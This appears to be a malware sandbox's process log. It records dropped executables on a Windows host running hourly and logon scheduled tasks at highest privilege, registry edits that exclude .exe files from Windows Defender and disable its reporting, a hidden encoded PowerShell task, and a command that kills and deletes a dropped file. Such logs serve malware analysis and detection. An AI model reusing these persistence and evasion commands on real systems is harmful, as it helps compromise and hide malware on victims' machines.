C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe
"C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe"
C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp" /SL5="$B00D6,4268356,54272,C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5600 -ip 5600
C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe
"C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe" -i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 772
C:\Users\Admin\Documents\GuardFox\63ijbZSUSBbYSuS8tRrtLvEY.exe
"C:\Users\Admin\Documents\GuardFox\63ijbZSUSBbYSuS8tRrtLvEY.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
C:\Users\Admin\Documents\GuardFox\Uihk1vSUEflfVRVgJ3Rfr90q.exe
"C:\Users\Admin\Documents\GuardFox\Uihk1vSUEflfVRVgJ3Rfr90q.exe"
C:\Users\Admin\Documents\GuardFox\r2UFDQC620faMK7tnGEjaJBS.exe
"C:\Users\Admin\Documents\GuardFox\r2UFDQC620faMK7tnGEjaJBS.exe"
C:\Users\Admin\Documents\GuardFox\HXXJISDL4_QGsMVnErfk32Xh.exe
"C:\Users\Admin\Documents\GuardFox\HXXJISDL4_QGsMVnErfk32Xh.exe"
C:\Users\Admin\Documents\GuardFox\cbBCotuiPHjezDdTSgibviGl.exe
"C:\Users\Admin\Documents\GuardFox\cbBCotuiPHjezDdTSgibviGl.exe"
C:\Users\Admin\Documents\GuardFox\DCEVEfkW_wIVRTVwXOeHDfD8.exe
"C:\Users\Admin\Documents\GuardFox\DCEVEfkW_wIVRTVwXOeHDfD8.exe"
C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe
"C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe"
C:\Users\Admin\AppData\Local\Temp\7zS7A0D.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe
"C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe" -s
C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe
"C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe"
C:\Users\Admin\Documents\GuardFox\L_WvMAjCxMVRwXtcjB8fqJFZ.exe
"C:\Users\Admin\Documents\GuardFox\L_WvMAjCxMVRwXtcjB8fqJFZ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 372
C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe
"C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5612 -ip 5612
C:\Users\Admin\AppData\Local\Temp\7zS8A2A.tmp\Install.exe
.\Install.exe /UPdidFN "525403" /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5176 -ip 5176
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5696 -ip 5696
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5760 -ip 5760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4356 -ip 4356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 500
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5612 -ip 5612
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 784
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1040
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1168
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1436
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "8Gi6lciEWsBYkwpuiH33GJM_.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1176
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2112 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gmMtRmbFQ" /SC once /ST 02:20:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3004 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\F9kYfzpze5OYnFrEBDA1.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\F9kYfzpze5OYnFrEBDA1.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4456 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:1
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "8Gi6lciEWsBYkwpuiH33GJM_.exe" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gmMtRmbFQ"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2392 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,16278317835196621194,14093405363716227959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,12680326858247453380,12073360191697778118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\9qHBpPmNB78MoXh8yQcR.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\9qHBpPmNB78MoXh8yQcR.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe
"C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 HR" /sc HOURLY /rl HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 LG" /sc ONLOGON /rl HIGHEST
C:\Users\Admin\AppData\Local\Temp\heidieBb12zNuQf9m\_YQeNBS1zclf3QHQ8lIb.exe
"C:\Users\Admin\AppData\Local\Temp\heidieBb12zNuQf9m\_YQeNBS1zclf3QHQ8lIb.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6260 /prefetch:8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gmMtRmbFQ"
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\edJKyoMW6gdgLu6ER1j0.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\edJKyoMW6gdgLu6ER1j0.exe"
